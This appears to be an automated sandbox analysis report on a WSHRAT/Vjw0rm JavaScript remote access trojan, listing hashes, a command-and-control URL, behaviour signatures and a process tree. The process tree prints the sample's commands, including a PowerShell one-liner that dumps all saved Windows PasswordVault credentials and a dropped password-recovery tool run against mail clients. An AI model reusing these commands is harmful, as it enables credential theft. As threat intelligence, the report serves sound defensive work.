Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    01-11-2022 08:16

General

  • Target

    FCR22001306.js

  • Size

    268KB

  • MD5

    d873c25379f94f8a1803f4c968befaf6

  • SHA1

    13293c020e2eec88e5627a44ec8eafa3b0d0f6ab

  • SHA256

    da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4

  • SHA512

    d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062

  • SSDEEP

    3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i

Malware Config

Extracted

Family

wshrat

C2

http://egodds.longmusic.com:2084

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • WSHRAT

    WSHRAT is a variant of the Houdini worm and has VBS and JS variants.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 24 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 3 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      PID:1360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1460
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1432
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:764
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      PID:1368
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:868
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook accounts
      PID:2008
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
      PID:1692

Downloads

    • C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

      Filesize

      373B

      MD5

      70e69155b8080b5db35191ab8426d084

      SHA1

      383deaaee90ce71b28b0a6e22124e77aa1cccf8b

      SHA256

      104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe

      SHA512

      c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe

      Filesize

      100KB

      MD5

      54e8ded7b148a13d3363ac7b33f6eb06

      SHA1

      63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9

      SHA256

      400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342

      SHA512

      bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

    • C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

      Filesize

      10KB

      MD5

      18aa18aca1d624556d87fd1c3c8dfc4a

      SHA1

      45509a074cd5f5d11d507a7fe0bcb733f874e90d

      SHA256

      27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036

      SHA512

      80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

    • memory/1168-54-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

      Filesize

      8KB

    • memory/1368-72-0x00000000760E1000-0x00000000760E3000-memory.dmp

      Filesize

      8KB

    • memory/1460-62-0x00000000027D4000-0x00000000027D7000-memory.dmp

      Filesize

      12KB

    • memory/1460-65-0x00000000027DB000-0x00000000027FA000-memory.dmp

      Filesize

      124KB

    • memory/1460-64-0x00000000027D4000-0x00000000027D7000-memory.dmp

      Filesize

      12KB

    • memory/1460-63-0x000000001B720000-0x000000001BA1F000-memory.dmp

      Filesize

      3.0MB

    • memory/1460-61-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1460-60-0x000007FEF3840000-0x000007FEF4263000-memory.dmp

      Filesize

      10.1MB